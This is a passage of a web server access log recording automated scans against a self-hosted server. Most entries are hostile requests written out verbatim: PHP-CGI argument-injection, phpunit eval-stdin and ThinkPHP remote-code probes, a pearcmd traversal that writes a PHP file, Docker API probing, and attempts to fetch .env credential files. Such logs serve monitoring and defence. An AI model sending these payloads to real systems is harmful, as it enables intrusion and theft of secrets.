"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:11:43:37 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:11:59:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:12:08:22 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:12:12:37 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:12:21:16 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 23.94.162.106] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:12:27:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:12:32:16 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[18/Jan/2026:12:32:49 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:12:41:04 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:12:41:46 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 217.154.69.208] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:12:42:22 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 217.154.69.208] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:12:42:23 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:23 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 217.154.69.208] [Length 154] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:24 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:24 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:25 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:26 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:26 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:27 +0000] 404 - GET http 91.82.83.208 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:27 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:28 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:29 +0000] 404 - GET http 91.82.83.208 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:29 +0000] 404 - GET http 91.82.83.208 "/phpunit/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:30 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:30 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:31 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:32 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:32 +0000] 404 - GET http 91.82.83.208 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:33 +0000] 404 - GET http 91.82.83.208 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:33 +0000] 404 - GET http 91.82.83.208 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:34 +0000] 404 - GET http 91.82.83.208 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:35 +0000] 404 - GET http 91.82.83.208 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:35 +0000] 404 - GET http 91.82.83.208 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:36 +0000] 404 - GET http 91.82.83.208 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:37 +0000] 404 - GET http 91.82.83.208 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:37 +0000] 404 - GET http 91.82.83.208 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:38 +0000] 404 - GET http 91.82.83.208 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:38 +0000] 404 - GET http 91.82.83.208 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:39 +0000] 404 - GET http 91.82.83.208 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:40 +0000] 404 - GET http 91.82.83.208 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:40 +0000] 404 - GET http 91.82.83.208 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:41 +0000] 404 - GET http 91.82.83.208 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:41 +0000] 404 - GET http 91.82.83.208 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:42 +0000] 404 - GET http 91.82.83.208 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:43 +0000] 404 - GET http 91.82.83.208 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:43 +0000] 404 - GET http 91.82.83.208 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:44 +0000] 404 - GET http 91.82.83.208 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:44 +0000] 404 - GET http 91.82.83.208 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:45 +0000] 404 - GET http 91.82.83.208 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:45 +0000] 404 - GET http 91.82.83.208 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:46 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:47 +0000] 404 - GET http 91.82.83.208 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:47 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:48 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../tmp/index1" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:42:49 +0000] 404 - GET http 91.82.83.208 "/containers/json" [Client 217.154.69.208] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:12:43:33 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; MAPBJS; rv:11.0) like Gecko" "-" +[18/Jan/2026:12:43:36 +0000] 404 - GET http 91.82.83.208 "/aws/local.bak" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 4.4.2; Hol-U19 Build/HUAWEIHol-U19) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36" "-" +[18/Jan/2026:12:43:36 +0000] 404 - GET http 91.82.83.208 "/prod/.env.dev" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3" "-" +[18/Jan/2026:12:43:36 +0000] 404 - GET http 91.82.83.208 "/test/.env.uat" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198.0 Safari/532.0" "-" +[18/Jan/2026:12:43:36 +0000] 404 - GET http 91.82.83.208 "/tmp/.env.save" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 5.0; Android SDK built for x86 Build/LRX09D) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36" "-" +[18/Jan/2026:12:43:36 +0000] 404 - GET http 91.82.83.208 "/nuxt/env.json" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Android 5.1.1; Tablet; rv:53.0) Gecko/53.0 Firefox/53.0" "-" +[18/Jan/2026:12:43:37 +0000] 404 - GET http 91.82.83.208 "/nuxt/env.yaml" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8" "-" +[18/Jan/2026:12:43:37 +0000] 404 - GET http 91.82.83.208 "/temp/env/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; sv-se) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27" "-" +[18/Jan/2026:12:43:37 +0000] 404 - GET http 91.82.83.208 "/old/.env.dist" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.1; et; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9" "-" +[18/Jan/2026:12:43:37 +0000] 404 - GET http 91.82.83.208 "/test/.env.tmp" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/9.70 (Linux i686 ; U; zh-cn) Presto/2.2.0" "-" +[18/Jan/2026:12:43:37 +0000] 404 - GET http 91.82.83.208 "/opencart/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 5.1.1; ZTE-Z716BL Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/42.0.2311.137 Mobile Safari/537.36" "-" +[18/Jan/2026:12:43:37 +0000] 404 - GET http 91.82.83.208 "/test/.env.gcp" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36" "-" +[18/Jan/2026:12:43:37 +0000] 404 - GET http 91.82.83.208 "/tmp/.env.conf" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[18/Jan/2026:12:43:38 +0000] 404 - GET http 91.82.83.208 "/tmp/.env.smtp" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/522.11.1 (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1" "-" +[18/Jan/2026:12:43:38 +0000] 404 - GET http 91.82.83.208 "/web/.env.dist" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:14.0) Gecko/20100101 Firefox/14.0.1" "-" +[18/Jan/2026:12:43:38 +0000] 404 - GET http 91.82.83.208 "/partners/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" +[18/Jan/2026:12:43:38 +0000] 400 - GET http 91.82.83.208 "/server/env.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Jan/2026:12:43:39 +0000] 404 - GET http 91.82.83.208 "/test/.env.key" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11" "-" +[18/Jan/2026:12:43:39 +0000] 404 - GET http 91.82.83.208 "/resource/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-J210F Build/MMB29Q) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36" "-" +[18/Jan/2026:12:43:39 +0000] 404 - GET http 91.82.83.208 "/panel/.env.db" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; LGMP450 Build/NRD90U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36" "-" +[18/Jan/2026:12:43:40 +0000] 404 - GET http 91.82.83.208 "/qa/config.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36 OPR/43.0.2442.806" "-" +[18/Jan/2026:12:43:41 +0000] 404 - GET http 91.82.83.208 "/wp-login/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Version/3.1.2 Safari/525.21" "-" +[18/Jan/2026:12:43:41 +0000] 404 - GET http 91.82.83.208 "/prod/.env.bak" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/8.51 (FreeBSD 5.1; U; en)" "-" +[18/Jan/2026:12:43:41 +0000] 404 - GET http 91.82.83.208 "/upload/.env.2" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.1.1; en-us; SAMSUNG-SGH-I747 Build/JRO03L) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[18/Jan/2026:12:43:41 +0000] 400 - GET http 91.82.83.208 "/public/env.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[18/Jan/2026:12:43:42 +0000] 404 - GET http 91.82.83.208 "/wp-config.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.6; tr-tr; GT-I8150 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[18/Jan/2026:12:43:42 +0000] 404 - GET http 91.82.83.208 "/test/.env.dev" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; LG-P769 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30evme-launcher" "-" +[18/Jan/2026:12:43:42 +0000] 404 - GET http 91.82.83.208 "/tmp/.env.test" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.3 (KHTML, like Gecko) Chrome/3.0.193.0 Safari/531.3" "-" +[18/Jan/2026:12:43:43 +0000] 404 - GET http 91.82.83.208 "/test/.env.php" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/9.10 (Windows NT 5.1; U; zh-tw)" "-" +[18/Jan/2026:12:43:43 +0000] 404 - GET http 91.82.83.208 "/umgebung/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-us) AppleWebKit/522.11.1 (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1" "-" +[18/Jan/2026:12:43:43 +0000] 404 - GET http 91.82.83.208 "/test/.env.pem" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/9.80 (Android 4.0.3; Linux; Opera Mobi/ADR-1301080958) Presto/2.11.355 Version/12.10" "-" +[18/Jan/2026:12:52:28 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:12:57:00 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:13:03:23 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 23.94.162.106] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:13:04:30 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:13:06:09 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:13:06:52 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 154.92.16.80] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:13:07:05 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 34.186.83.175] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" "-" +[18/Jan/2026:13:07:05 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 34.186.83.175] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" "-" +[18/Jan/2026:13:07:06 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/wlwmanifest.xml" [Client 34.186.83.175] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" "-" +[18/Jan/2026:13:07:06 +0000] 404 - GET http profibot.direct.quickconnect.to "/xmlrpc.php?rsd" [Client 34.186.83.175] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" "-" +[18/Jan/2026:13:07:07 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 34.186.83.175] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" "-" +[18/Jan/2026:13:07:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/blog/wp-includes/wlwmanifest.xml" [Client 34.186.83.175] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" "-" +[18/Jan/2026:13:07:08 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 154.92.16.80] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:13:07:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/web/wp-includes/wlwmanifest.xml" [Client 34.186.83.175] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" "-" +[18/Jan/2026:13:07:08 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 154.92.16.80] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:07:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/wordpress/wp-includes/wlwmanifest.xml" [Client 34.186.83.175] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" "-" +[18/Jan/2026:13:07:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/website/wp-includes/wlwmanifest.xml" [Client 34.186.83.175] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" "-" +[18/Jan/2026:13:07:09 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp/wp-includes/wlwmanifest.xml" [Client 34.186.83.175] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" "-" +[18/Jan/2026:13:07:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/news/wp-includes/wlwmanifest.xml" [Client 34.186.83.175] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" "-" +[18/Jan/2026:13:07:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/2020/wp-includes/wlwmanifest.xml" [Client 34.186.83.175] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" "-" +[18/Jan/2026:13:07:10 +0000] 404 - GET http profibot.direct.quickconnect.to "/2019/wp-includes/wlwmanifest.xml" [Client 34.186.83.175] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" "-" +[18/Jan/2026:13:07:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/shop/wp-includes/wlwmanifest.xml" [Client 34.186.83.175] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" "-" +[18/Jan/2026:13:07:11 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 154.92.16.80] [Length 154] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:13:07:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp1/wp-includes/wlwmanifest.xml" [Client 34.186.83.175] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" "-" +[18/Jan/2026:13:07:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/test/wp-includes/wlwmanifest.xml" [Client 34.186.83.175] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" "-" +[18/Jan/2026:13:07:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp2/wp-includes/wlwmanifest.xml" [Client 34.186.83.175] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" "-" +[18/Jan/2026:13:07:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/site/wp-includes/wlwmanifest.xml" [Client 34.186.83.175] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" "-" +[18/Jan/2026:13:07:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/cms/wp-includes/wlwmanifest.xml" [Client 34.186.83.175] [Length 552] [Gzip -] "Mozilla/5.0 